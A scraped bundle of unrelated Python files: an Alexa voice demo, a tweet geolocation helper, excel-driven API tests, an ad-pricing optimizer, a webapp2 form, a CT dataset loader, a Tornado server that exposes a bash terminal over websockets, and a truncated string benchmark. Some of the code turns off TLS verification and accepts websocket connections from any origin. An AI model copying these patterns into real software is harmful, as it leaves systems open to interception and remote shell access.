\"IDLE\"\n }\n }\n ]\n },\n \"messageBody\": {\n \"profile\": \"alexa-close-talk\",\n \"locale\": \"en-us\",\n \"format\": \"audio/L16; rate=16000; channels=1\"\n }\n }\n with open(path + 'recording.wav') as inf:\n files = [ # a list\n ('file', ('request', json.dumps(d), 'application/json; charset=UTF-8')),\n ('file', ('audio', inf, 'audio/L16; rate=16000; channels=1'))\n ]\n print(type(files))\n print(type(d))\n r = requests.post(url, headers=headers, files=files)\n if r.status_code == 200:\n for v in r.headers['content-type'].split(\";\"):\n if re.match('.*boundary.*', v):\n boundary = v.split(\"=\")[1]\n data = r.content.split(boundary)\n for d in data:\n if (len(d) >= 1024):\n audio = d.split('\\r\\n\\r\\n')[1].rstrip('--')\n print(type(audio))\n with open(path + \"response.mp3\", 'wb') as f:\n f.write(audio)\n os.system(\n 'mpg123 -q {}1sec.mp3 {}response.mp3'.format(path + \"/assets/\", path))\n else:\n print(\"requests returned r.status_code = %r\" % r.status_code)\n\n\ndef start():\n print(\"Touch MATRIX Creator IR Sensor\")\n process = subprocess.Popen(\n ['./micarray/build/micarray_dump'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n audio, err = process.communicate()\n\n rf = open(path + 'recording.wav', 'w')\n rf.write(audio)\n rf.close()\n alexa()\n\n\nif __name__ == \"__main__\":\n print(\"This is a MATRIX Creator demo - not ready for production\")\n print(\"Running workaround for GPIO 16 (IR-RX) \")\n subprocess.Popen(['sudo', 'rmmod', 'lirc_rpi'])\n\n while internet_on() == False:\n print(\".\")\n token = gettoken()\n os.system('mpg123 -q {}1sec.mp3 {}hello.mp3'.format(path +\n \"/assets/\", path + \"/assets/\"))\n while True:\n subprocess.Popen(['gpio','edge','16','both'])\n start()\n","sub_path":"audio/DIYAmazonAlexa/DIYAmazonAlexa.py","file_name":"DIYAmazonAlexa.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"58424255","text":"from country_bounding_boxes import (\n country_subunits_containing_point,\n country_subunits_by_iso_code\n)\nimport os\nimport json\n\nCOUNTRY_INDEX = 0\nLANG_INDEX = 15\n\n# Recieves a lang string and converts it so it can be used with langs for tweets in our db\ndef convert_lang(lang):\n if(len(lang) == 2):\n return lang\n elif(len(lang) == 3):\n return None\n elif(len(lang) == 5):\n return lang[:2]\n else:\n return None\n\n# Returns bounding boxes for a country.\n# The country MUST be specified in two letter ISO format\ndef get_bounding_boxes_for_country(country_code):\n if len([c for c in country_subunits_by_iso_code(country_code)]) == 0:\n return None\n\n return {\n 'bboxes': [c.bbox for c in country_subunits_by_iso_code(country_code)],\n 'weights': [c.pop_est for c in country_subunits_by_iso_code(country_code)]\n }\n\n# Get all country codes that speak a language\ndef get_country_codes_speaking_lang(tweet_lang):\n\n dir = os.path.dirname(__file__)\n filename = os.path.join(dir, 'map_lang_to_countries.json')\n if(not os.path.isfile(filename)):\n preprocess_lang_file()\n \n res = []\n with open(filename, 'r') as data_file: \n data = json.load(data_file)\n return data.get(tweet_lang)\n\n# The entry point for this layer\ndef get_bboxes_and_weights(tweet_lang):\n countries = get_country_codes_speaking_lang(tweet_lang)\n if(countries != None):\n bboxes = list(map(get_bounding_boxes_for_country, countries))\n bboxes = list(filter(None, bboxes))\n return bboxes\n\n# This can be run to \ndef preprocess_lang_file():\n dir = os.path.dirname(__file__)\n filename = os.path.join(dir, '../data/geonames/countryInfo.txt')\n country_languages = open(filename, 'r', encoding=\"utf-8\")\n\n res = {}\n\n for line in country_languages:\n # Skip comments\n if(line[0] == '#'):\n continue\n \n splitted_line = line.split('\\t')\n\n # Get country\n country = splitted_line[COUNTRY_INDEX]\n\n # Get all langs in a list\n langs = splitted_line[LANG_INDEX].split(',')\n langs = list(map(convert_lang, langs))\n langs = list(filter(None, langs))\n\n for lang in langs:\n if(res.get(lang) == None):\n res[lang] = []\n res[lang].append(country)\n\n file = open('map_lang_to_countries.json', 'w') \n file.write(json.dumps(res, sort_keys=True, indent=4, separators=(',', ': ')))\n file.close() \n print('Saved preprocessed file in map_lang_to_countries.json')","sub_path":"layers_method/tweet_lang.py","file_name":"tweet_lang.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"576780862","text":"from unittest import TestCase\r\nfrom public_data.public_data import *\r\nimport unittest\r\nimport requests\r\nimport json\r\n\r\nclass UserInfo(TestCase):\r\n logger.info('=' * 30 + '[开始执行用户信息模块接口用例]' + '=' * 30)\r\n def setUp(self):\r\n self.urlsite = (read_excel('publicData', 1, 1)) # 公共url\r\n self.all_sheet = 2 # 写入的数据是第几张表\r\n self.sheetNAME = 'Userinfo' # 读取的表的名字是哪一张\r\n\r\n def tearDown(self):\r\n logger.info(self.apiname)\r\n logger.info(self.parameter)\r\n logger.info(self.dd)\r\n\r\n '''将断言写数据弄成一个方法'''\r\n def requestHandler(self, reqdata, row):\r\n self.result = requests.post(self.urlsite, data=reqdata,verify=False) # 发送post请求,将 verify 设置为 False,Requests 也能忽略对 SSL 证书的验证。\r\n self.dd = json.loads(self.result.text) # 将json格式转换为python字典格式方便取出键值\r\n # 进行断言,将result实际值与表格中预期结果进行比对\r\n self.assertEqual(int(self.dd['result']), int(read_excel(self.sheetNAME, row, 6)))\r\n # # 写入result值,0为正常\r\n write_excel(self.all_sheet, row, 8, 'result:' + str(self.dd['result']))\r\n\r\n def test_userinfo1(self,row=1):\r\n '''获取用户列表'''\r\n self.apiname=read_excel(self.sheetNAME,row,2)\r\n self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n def test_userinfo2(self,row=3):\r\n '''新建用户'''\r\n self.apiname=read_excel(self.sheetNAME,row,2)\r\n self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n # def test_userinfo3(self,row=4):\r\n # '''更新用户'''\r\n # self.apiname=read_excel(self.sheetNAME,row,2)\r\n # self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n # print(self.parameter)\r\n # self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n def test_userinfo4(self,row=5):\r\n '''更新密码'''\r\n self.apiname=read_excel(self.sheetNAME,row,2)\r\n self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n def test_userinfo5(self, row=6):\r\n '''用户锁定'''\r\n self.apiname = read_excel(self.sheetNAME, row, 2)\r\n self.parameter = Headers(read_excel('publicData', 4, 1), read_excel('Userinfo', row, 5))\r\n self.requestHandler(reqdata=self.parameter, row=row)\r\n\r\n def test_userinfo6(self, row=7):\r\n '''用户解锁'''\r\n self.apiname = read_excel(self.sheetNAME, row, 2)\r\n self.parameter = Headers(read_excel('publicData', 4, 1), read_excel('Userinfo', row, 5))\r\n self.requestHandler(reqdata=self.parameter, row=row)\r\n\r\n def test_userinfo7(self, row=2):\r\n '''用户删除'''\r\n self.apiname = read_excel(self.sheetNAME, row, 2)\r\n self.parameter = Headers(read_excel('publicData', 4, 1), read_excel('Userinfo', row, 5))\r\n print(self.parameter)\r\n self.requestHandler(reqdata=self.parameter, row=row)\r\n\r\nif __name__ == '__main__':\r\n suite = unittest.TestSuite()\r\n suite.addTest(UserInfo('test_userinfo1'))\r\n runner = unittest.TextTestRunner()\r\n runner.run(suite)\r\n","sub_path":"RasyncadminApi/testcase/test_02_userinfo.py","file_name":"test_02_userinfo.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336621960","text":"from pprint import pprint\n\nclass AbstractDemandStack(object):\n\n def __init__(self, line_items, adx_feed, options):\n # self.line_items = sorted(\n # line_items,\n # key=lambda li: li.current_adx_price_decimal(),\n # reverse=True\n # )\n self.line_items = line_items\n self.adx_feed = adx_feed\n self.target_adx_fill_rate = options['target_adx_fill_rate']\n self.delta_per_opt = options['delta_per_optimization']\n if self.delta_per_opt < 0:\n raise Exception('delta_per_optimization must not be negative: '+str(self.delta_per_opt))\n\n\nclass StaticDemandStack(AbstractDemandStack):\n def optimize(self):\n return {\n 'line_item_changes': [],\n }\n\n\nclass OptimizingDemandStack(AbstractDemandStack):\n FILL_RATE_MARGIN = 1.0\n\n def optimize(self):\n direction = self.fill_rate_direction()\n adjust_reports = []\n if direction == 1:\n idx = 0\n for line_item in self.line_items:\n adx_price_previous = self.line_items[idx - 1].adx_price() - 1 if idx > 0 else None\n report = line_item.increase_price(self.delta_per_opt, adx_price_previous)\n if report is not None and not self._is_empty_report(report):\n adjust_reports.append(report)\n idx += 1\n elif direction == -1:\n idx = 0\n self.line_items.reverse()\n for line_item in self.line_items:\n adx_price_previous = self.line_items[idx - 1].adx_price() + 1 if idx > 0 else None\n report = line_item.decrease_price(-1 * self.delta_per_opt, adx_price_previous)\n if report is not None and not self._is_empty_report(report):\n adjust_reports.append(report)\n idx += 1\n adjust_reports.reverse()\n self.line_items.reverse()\n else:\n # direction is 0, meaning we have arrived at the target fill rate\n pass\n \n return {\n 'line_item_changes': adjust_reports,\n }\n\n def _is_empty_report(self, report):\n return report['adx_price_before'] == report['adx_price_after']\n\n def fill_rate_direction(self):\n distance_to_target = self.target_adx_fill_rate - self.adx_feed.fill_rate_for(self)\n\n if abs(distance_to_target) <= self.FILL_RATE_MARGIN:\n return 0\n\n if distance_to_target < 0:\n return 1\n else:\n return -1\n","sub_path":"demand_stack.py","file_name":"demand_stack.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"125100529","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\n\n\nform = \"\"\"\n <form method=\"post\">\n <label>\n Month\n <input type=\"text\" name=\"month\" value=\"%(month)s\">\n </label>\n <label>\n Day\n <input type=\"text\" name=\"day\" value=\"%(day)s\">\n </label>\n <label>\n Year\n <input type=\"text\" name=\"year\" value=\"%(year)s\">\n </label>\n <div style=\"color:red;\">%(error)s</div>\n <br>\n <br>\n <input type=\"submit\">\n </form>\n \"\"\"\n\ntexta = \"\"\"\n <form metho=\"post\">\n <h1>Enter some text to ROT13:</h1>\n <textarea style=\"height: 100px; width: 400px;\">\n </textarea>\n <br>\n\n <input type=\"submit\">\n </form>\n \"\"\"\nclass MainHandler(webapp2.RequestHandler):\n \n months=['January',\n 'February',\n 'March',\n 'April',\n 'May',\n 'June',\n 'July',\n 'August',\n 'September',\n 'October',\n 'November',\n 'December'\n ]\n\n #error method\n def errorForm(self, error=\"\", month=\"\", day=\"\", year=\"\"):\n self.response.out.write(form % {\"error\": error, \"month\":month, \"day\":day, \"year\":year})\n\n # valiate month\n def valid_month(self, month):\n if month:\n cap_month = month.capitalize()\n if cap_month in self.months:\n return cap_month\n\n # validate day\n def valid_day(self, day): \n if day and day.isdigit():\n day = int(day)\n if day > 0 and day <= 31:\n return day\n\n #validate year\n def validate_year(self, year):\n if year and year.isdigit():\n year = int(year)\n if year > 1900 and year <= 2020: \n return year\n\n def get(self):\n self.errorForm()\n\n def post(self):\n\n # get what users enter\n user_month = self.request.get('month')\n user_day = self.request.get('day')\n user_year = self.request.get('year')\n\n #validate the inputs\n month = self.valid_month(user_month)\n day = self.valid_day(user_day)\n year = self.validate_year(user_year)\n\n if not (month and day and year):\n self.errorForm('Invalid data, please try again', user_month, user_day, user_year)\n else:\n self.redirect('/thanks')\n\n\n# class handler\nclass ThanksHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('Thanks for you data!');\n\n# class for rot13\nclass Rot13(webapp2.RequestHandler):\n\n def write_form(self, error=\"\"):\n self.response.out.write(texta)\n\n def get(self):\n self.write_form()\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler), ('/thanks', ThanksHandler), ('/rot13', Rot13)\n], debug=True)\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"412653710","text":"import torch\nimport nibabel as nib\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\nfrom src.data.datasets import BaseDataset\nfrom src.data.transforms import Compose, ToTensor\n\n\nclass LitsAdaptDataset(BaseDataset):\n \"\"\"The dataset of the Liver Tumor Segmentation Challenge (LiTS) in MICCAI 2017\n for the self-supervised learning.\n\n Ref:\n https://competitions.codalab.org/competitions/17094\n https://github.com/PatrickChrist/LITS-CHALLENGE/blob/master/submission-guide.md\n\n Args:\n data_split_file_path (str): The data split file path.\n preprocess (BoxList): The preprocessing techniques applied to the data.\n transforms (BoxList): The self-supervised transforms applied to the data.\n \"\"\"\n\n def __init__(self, data_split_file_path, preprocess, transforms, **kwargs):\n super().__init__(**kwargs)\n if self.type == 'train':\n data_split_file = pd.read_csv(data_split_file_path)\n patient_dirs = map(\n Path,\n data_split_file[\n (data_split_file.type == 'train') | (data_split_file.type == 'valid')\n ].path\n )\n self.data_paths = tuple(\n data_path\n for patient_dir in patient_dirs\n for data_path in sorted(patient_dir.glob('**/*volume-*.nii'))\n )\n elif self.type == 'valid':\n self.data_paths = tuple(['nan'])\n\n self.preprocess = Compose.compose(preprocess)\n self.transforms = Compose.compose(transforms)\n self.to_tensor = ToTensor()\n\n def __getitem__(self, index):\n ct_path = self.data_paths[index]\n nii_img = nib.load(ct_path.as_posix())\n ct = nii_img.get_fdata().astype(np.float32)[..., np.newaxis]\n input_spacing = nii_img.header['pixdim'][1:4]\n transforms_kwargs = {\n 'Resample': {\n 'input_spacings': (input_spacing,),\n 'orders': (1,)\n }\n }\n ct, = self.preprocess(ct, **transforms_kwargs)\n transformed_ct, = self.transforms(ct)\n transformed_ct, ct = self.to_tensor(transformed_ct, ct, dtypes=[torch.float, torch.float])\n metadata = {'input': transformed_ct, 'target': ct}\n return metadata\n\n def __len__(self):\n return len(self.data_paths)\n","sub_path":"src/data/datasets/lits_adapt_dataset.py","file_name":"lits_adapt_dataset.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"604907649","text":"\"\"\"A single common terminal for all websockets.\n\"\"\"\nimport tornado.web\n# This demo requires tornado_xstatic and XStatic-term.js\nimport tornado_xstatic\n\nimport os.path\nimport webbrowser\nimport tornado.httpserver\nimport tornado.ioloop\nimport terminado\nfrom terminado import TermSocket, UniqueTermManager, uimodule\nimport tempfile\n\n# {week: max steps}\nCLASS00_STEP_DICT = {0: 2}\nCLASS01_STEP_DICT = {0: 6}\nCLASS02_STEP_DICT = {0: 6, 1: 13, 2: 9, 3: 10, 4: 9, 5: 7, 6: 5, 7: 5, 8: 7, 9: 2, 10: 4}\n# 03: Ms. Thomas' and Mr. Lamb's Classes\nCLASS03_STEP_DICT = {0: 6, 1: 8, 2: 8, 3: 5, 4: 5, 5: 4, 6: 7, 7: 6, 8: 6}\nCLASS04_STEP_DICT = {0: 11, 1: 11}\n# 05: Basic Python\nCLASS05_STEP_DICT = {0: 6, 1: 6, 2: 6, 3: 4, 4: 4, 5: 5, 6: 5, 7: 5}\n# 06: Intermediate Python\nCLASS06_STEP_DICT = {0: 6, 1: 5, 2: 7, 3: 5, 4: 6, 5: 6, 6: 6, 7: 5, 8: 5, 9: 4, 10: 6}\n# 07: Introduction to Programming (Web)\nCLASS07_STEP_DICT = {0: 6, 1: 8, 2: 8, 3: 5, 4: 5, 5: 4}\n# 08: Introduction to Programming (Raspberry Pi)\nCLASS08_STEP_DICT = {0: 6, 1: 6, 2: 9, 3: 5, 4: 5, 5: 4}\nCLASS10_STEP_DICT = {0: 6, 1: 5, 2: 8, 3: 5}\n# 14: Common Core Math\nCLASS14_STEP_DICT = {0: 6, 1: 5, 2: 7, 3: 5}\n\nCLASS_DICT = {'00': CLASS00_STEP_DICT, '01': CLASS01_STEP_DICT, '02': CLASS02_STEP_DICT, '03': CLASS03_STEP_DICT,\n '04': CLASS04_STEP_DICT, '05': CLASS05_STEP_DICT, '06': CLASS06_STEP_DICT, '07': CLASS07_STEP_DICT,\n '08': CLASS08_STEP_DICT, '10': CLASS10_STEP_DICT, '14': CLASS14_STEP_DICT}\n\nNO_SKULPT = False\n\nFILE_PATH = \"\"\n\n\nclass ClassDir(tornado.web.RequestHandler):\n def get(self, dir):\n directory = dir + '.html'\n return self.render('directory/' + directory)\n\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n def open(self):\n # self.ping('one')\n print('new connection')\n\n def on_pong(self, data):\n print('got pong', data)\n\n def on_message(self, message):\n print('=====Code Being Run: Start=====')\n print(message)\n print('=====Code Being Run: End=====')\n\n # code = message\n\n tf = tempfile.NamedTemporaryFile(delete=False)\n tfName = tf.name\n tf.seek(0)\n # tf.write(code)\n tf.write(message.encode(\"utf-8\"))\n tf.flush()\n # print('The temporary python file is ' + tfName)\n\n # print 'message received:\\n%s' % message\n self.write_message(tfName)\n\n def on_close(self):\n print('connection closed')\n\n def check_origin(self, origin):\n return True\n\n\nclass ClassWeek(tornado.web.RequestHandler):\n def get(self, class_url, week_url, step_url): #(self, class_url, week_url, step_url):\n class_number = class_url.replace('class', '')\n week_number = int(week_url.replace('week', ''))\n step_number = step_url.replace('step', '')\n # print(class_url, week_url, step_url, class_dict)\n max_steps = range(CLASS_DICT[class_number][week_number])\n path_to_step = 'classes/' + class_url + '/' + week_url + '/' + step_url + '/main.html'\n return self.render(path_to_step, current_class=class_url, current_week=week_url,\n current_step=step_number, total_steps=max_steps, step_path=path_to_step,\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\")\n\nclass ClassLesson(tornado.web.RequestHandler):\n def get(self, class_url, lesson_url, step_url): #(self, class_url, week_url, step_url):\n class_number = class_url.replace('class', '')\n lesson_number = int(lesson_url.replace('lesson', ''))\n step_number = step_url.replace('step', '')\n # print(class_url, lesson_url, step_url)\n max_steps = range(CLASS_DICT[class_number][lesson_number])\n path_to_step = 'classes/' + class_url + '/' + lesson_url + '/' + step_url + '/main.html'\n return self.render(path_to_step, current_class=class_url, current_week=lesson_url,\n current_step=step_number, total_steps=max_steps, step_path=path_to_step,\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\")\n\nclass TerminalHandler(tornado.web.RequestHandler):\n def get(self):\n return self.render(\"index.html\",\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\"\n )\n\n\nclass TestHandler(tornado.web.RequestHandler):\n def get(self):\n return self.render(\"pybly.html\",\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\"\n )\n\n\ndef main(argv):\n\n term_manager = UniqueTermManager(shell_command=['bash'])\n\n handlers = [\n (r\"/websocket\", TermSocket,\n {'term_manager': term_manager, 'keep_alive_time': 30}), # AJL: added the keep_alive after noticed dropped ws in class after 55s Heroku limit.\n (r\"/\", TerminalHandler),\n (r\"/xstatic/(.*)\", tornado_xstatic.XStaticFileHandler,\n {'allowed_modules': ['termjs']}),\n (r\"/(dir[0-9][0-9])\", ClassDir),\n (r\"/(class[0-9][0-9])/(week[0-9][0-9])/([0-9][0-9])\", ClassWeek),\n (r\"/(class[0-9][0-9])/(lesson[0-9][0-9])/([0-9][0-9])\", ClassLesson),\n # (r\"/test\", TestHandler),\n (r\"/ws\", WSHandler),\n ]\n\n app = tornado.web.Application(handlers,\n # static_path=os.path.join(os.path.dirname(terminado.__file__), \"static/js\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n # static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n ui_modules={'Terminal': uimodule.Terminal},\n xstatic_url=tornado_xstatic.url_maker('/xstatic/', True)\n )\n\n http_server = tornado.httpserver.HTTPServer(app)\n port = int(os.environ.get(\"PORT\", 8765))\n http_server.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == '__main__':\n main([])","sub_path":"pybly.py","file_name":"pybly.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"532024765","text":"from connection import connect\nfrom create_query_sql import creation_query_list\n\ndef create_db(query_list = None):\n if query_list is None:\n query_list = creation_query_list\n\n conn = connect()\n cursor = conn.cursor()\n for query in query_list:\n try:\n cursor.execute(query)\n except:\n print(f\"nie udało się wykonać zapytania {query}\")\n conn.close()\n\nif __name__ == \"__main__\":\n create_db()\n\n","sub_path":"PycharmProjects/pythonProject3/creation_db.py","file_name":"creation_db.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"527117194","text":"import pyspark\n\nsc = pyspark.SparkContext()\n\ndef clean_trans(trans):\n try:\n fields = trans.split(',')\n if len(fields)!=7:\n return False\n int(fields[3])\n return True\n except:\n return False\n\n\ndef clean_contracts(contract):\n try:\n fields = contract.split(',')\n if len(fields)!=5:\n return False\n return True\n except:\n return False\n\ntrans = sc.textFile(\"/data/ethereum/transactions\")\ntrans_f = trans.filter(clean_trans)\naddress=trans_f.map(lambda l: (l.split(',')[2], int(l.split(',')[3]))).persist()\npartbjob1output = address.reduceByKey(lambda a,b:(a+b))\npartbjob1output_join=partbjob1output.map(lambda f:(f[0], f[1]))\n\ncontracts = sc.textFile(\"/data/ethereum/contracts\")\ncontracts_f = contracts.filter(clean_contracts)\ncontracts_join = contracts_f.map(lambda f: (f.split(',')[0],f.split(',')[3]))\n\npartbjob2output = partbjob1output_join.join(contracts_join)\n\ntop10=partbjob2output.takeOrdered(10, key = lambda x:-x[1][0])\nfor record in top10:\n print(\"{}: {}\".format(record[0],record[1][0]))\n","sub_path":"PartD/ComparitiveEval/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"220592827","text":"'''\nAbstract class for the annotator models.\n'''\nimport numpy as np\nfrom scipy.special import gammaln\n\nclass Annotator():\n\n def update_post_alpha(self, E_t, C, doc_start, nscores):\n pass\n\n\n def update_post_alpha_data(self, model_idx, E_t, C, doc_start, nscores):\n pass\n\n\n def read_lnPi(self, l, C, Cprev, Krange, nscores, blanks):\n return self._read_lnPi(self.lnPi, l, C, Cprev, Krange, nscores, blanks)\n\n\n def read_lnPi_data(self, l, C, Cprev, nscores, model_idx):\n return self._read_lnPi(self.lnPi_data[model_idx], l, C, Cprev, 0, nscores, None)\n\n\n def read_lnEPi(self, l, C, Cprev, Krange, nscores, blanks):\n lnEPi = self.lnEPi()\n return self._read_lnPi(lnEPi, l, C, Cprev, Krange, nscores, blanks)\n\n\n def read_lnEPi_data(self, l, C, Cprev, nscores, model_idx):\n lnEPi_data = self.lnEPi_data()\n return self._read_lnPi(lnEPi_data[model_idx], l, C, Cprev, 0, nscores, None)\n\n\n def _read_lnPi(self, lnPi, l, C, Cprev, workeridxs, nscores, blanks):\n pass\n\n\n def q_pi(self):\n self.lnPi = self._calc_q_pi(self.alpha)\n\n\n def q_pi_data(self, model_idx):\n self.lnPi_data[model_idx] = self._calc_q_pi(self.alpha_data[model_idx])\n\n def _calc_q_pi(self, alpha):\n pass\n\n\n def lnEPi(self):\n EPi = self._calc_EPi(self.alpha)\n\n lnEPi = np.zeros_like(EPi)\n lnEPi[EPi != 0] = np.log(EPi[EPi != 0])\n lnEPi[EPi == 0] = -np.inf\n\n return lnEPi\n\n\n def lnEPi_data(self):\n if len(self.alpha0_data) == 0:\n return 0\n\n lnEPi_data = []\n\n for midx, _ in enumerate(self.alpha_data):\n EPi_m = self._calc_EPi(self.alpha_data[midx])\n lnEPi_m = np.zeros_like(EPi_m)\n lnEPi_m[EPi_m != 0] = np.log(EPi_m[EPi_m != 0])\n lnEPi_m[EPi_m == 0] = -np.inf\n lnEPi_data.append(lnEPi_m)\n\n return lnEPi_data\n\n\n def annotator_accuracy(self):\n if self.alpha.ndim == 3:\n annotator_acc = self.alpha[np.arange(self.L), np.arange(self.L), :] \\\n / np.sum(self.alpha, axis=1)\n elif self.alpha.ndim == 2:\n annotator_acc = self.alpha[1, :] / np.sum(self.alpha[:2, :], axis=0)\n elif self.alpha.ndim == 4:\n annotator_acc = np.sum(self.alpha, axis=2)[np.arange(self.L), np.arange(self.L), :] \\\n / np.sum(self.alpha, axis=(1,2))\n\n if self.beta.ndim == 2:\n beta = np.sum(self.beta, axis=0)\n else:\n beta = self.beta\n\n annotator_acc *= (beta / np.sum(beta))[:, None]\n annotator_acc = np.sum(annotator_acc, axis=0)\n\n return annotator_acc\n\n\n def informativeness(self):\n\n ptj = np.zeros(self.L)\n for j in range(self.L):\n ptj[j] = np.sum(self.beta0[:, j]) + np.sum(self.Et == j)\n\n entropy_prior = -np.sum(ptj * np.log(ptj))\n\n ptj_c = np.zeros((self.L, self.L, self.K))\n for j in range(self.L):\n if self.alpha.ndim == 4:\n ptj_c[j] = np.sum(self.alpha[j, :, :, :], axis=1) / np.sum(self.alpha[j, :, :, :], axis=(0,1))[None, :] * ptj[j]\n elif self.alpha.ndim == 3:\n ptj_c[j] = self.alpha[j, :, :] / np.sum(self.alpha[j, :, :], axis=0)[None, :] * ptj[j]\n else:\n print('Warning: informativeness not defined for this annotator model.')\n\n ptj_giv_c = ptj_c / np.sum(ptj_c, axis=0)[None, :, :]\n\n entropy_post = -np.sum(ptj_c * np.log(ptj_giv_c), axis=(0,1))\n\n return entropy_prior - entropy_post\n\n\ndef log_dirichlet_pdf(alpha, lnPi, sum_dim):\n x = (alpha - 1) * lnPi\n gammaln_alpha = gammaln(alpha)\n invalid_alphas = np.isinf(gammaln_alpha) | np.isinf(x) | np.isnan(x)\n gammaln_alpha[invalid_alphas] = 0 # these possibilities should be excluded\n x[invalid_alphas] = 0\n x = np.sum(x, axis=sum_dim)\n z = gammaln(np.sum(alpha, sum_dim)) - np.sum(gammaln_alpha, sum_dim)\n if not np.isscalar(z):\n z[np.isinf(z)] = 0\n return np.sum(x + z)","sub_path":"src/bsc/annotator_model.py","file_name":"annotator_model.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"599993254","text":"\"\"\"\n 给定一个包含n个整数的数组nums和一个目标值target,判断nums中是否存在四个元素a,b,c和d,使得a+b+c+d的值与target相等?\n 找出所有满足条件且不重复的四元组。\n 注意:\n 答案中不可以包含重复的四元组。\n 示例:\n 给定数组 nums = [1, 0, -1, 0, -2, 2],和 target = 0。\n 满足要求的四元组集合为:\n [\n [-1, 0, 0, 1],\n [-2, -1, 1, 2],\n [-2, 0, 0, 2]\n ]\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n pass\n\n @classmethod\n def solve_1(cls, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n\n size = len(nums)\n res = []\n\n for i in range(size - 3):\n if i > 0 and nums[i] == nums[i - 1]:\n continue\n if nums[i] + nums[i + 1] + nums[i + 2] + nums[i + 3] > target:\n break\n if nums[i] + nums[size - 1] + nums[size - 2] + nums[size - 3] < target:\n continue\n\n for j in range(i + 1, size - 2):\n if j - i > 1 and nums[j] == nums[j - 1]:\n continue\n if nums[i] + nums[j] + nums[j + 1] + nums[j + 2] > target:\n break\n if nums[i] + nums[j] + nums[size - 2] + nums[size - 1] < target:\n continue\n\n left = j + 1\n right = size - 1\n\n while left < right:\n check_target = nums[i] + nums[j] + nums[left] + nums[right]\n if check_target == target:\n res.append([nums[i], nums[j], nums[left], nums[right]])\n while left < right and nums[left] == nums[left + 1]:\n left += 1\n\n while left < right and nums[right] == nums[right - 1]:\n right -= 1\n\n left += 1\n right -= 1\n elif check_target > target:\n right -= 1\n else:\n left += 1\n return res\n\n\nif __name__ == '__main__':\n print(Solution().solve_1([1, 0, -1, 0, -2, 2], 0))\n","sub_path":"algorithm/LeetCode_18_四数之和.py","file_name":"LeetCode_18_四数之和.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"268041685","text":"import random, time, sys\n\ndef create_random_line(size):\n str1 = \"\"\n str2 = \"\"\n\n random.seed()\n size1 = size2 = size\n\n for i in range (size1):\n str1 += chr(random.randint(32, 126))\n\n for i in range (size2):\n str2 += chr(random.randint(32, 126))\n\n return str1, str2\n\ndef print_matrix(mat):\n print(\"\")\n for i in range (len(mat)):\n print(mat[i])\n\ndef create_matrix(weight, height):\n res = []\n for i in range (len(height) + 1):\n res.append([0]*(len(weight) + 1))\n\n return res\n\ndef compare():\n for i in range(2, 11):\n print(i)\n str1, str2 = create_random_line(i)\n #---------------------------\n time_start = time.process_time()\n\n for i in range(1000):\n lev_mat(str1, str2)\n\n time_end = time.process_time()\n print('{:.7f}'.format((time_end - 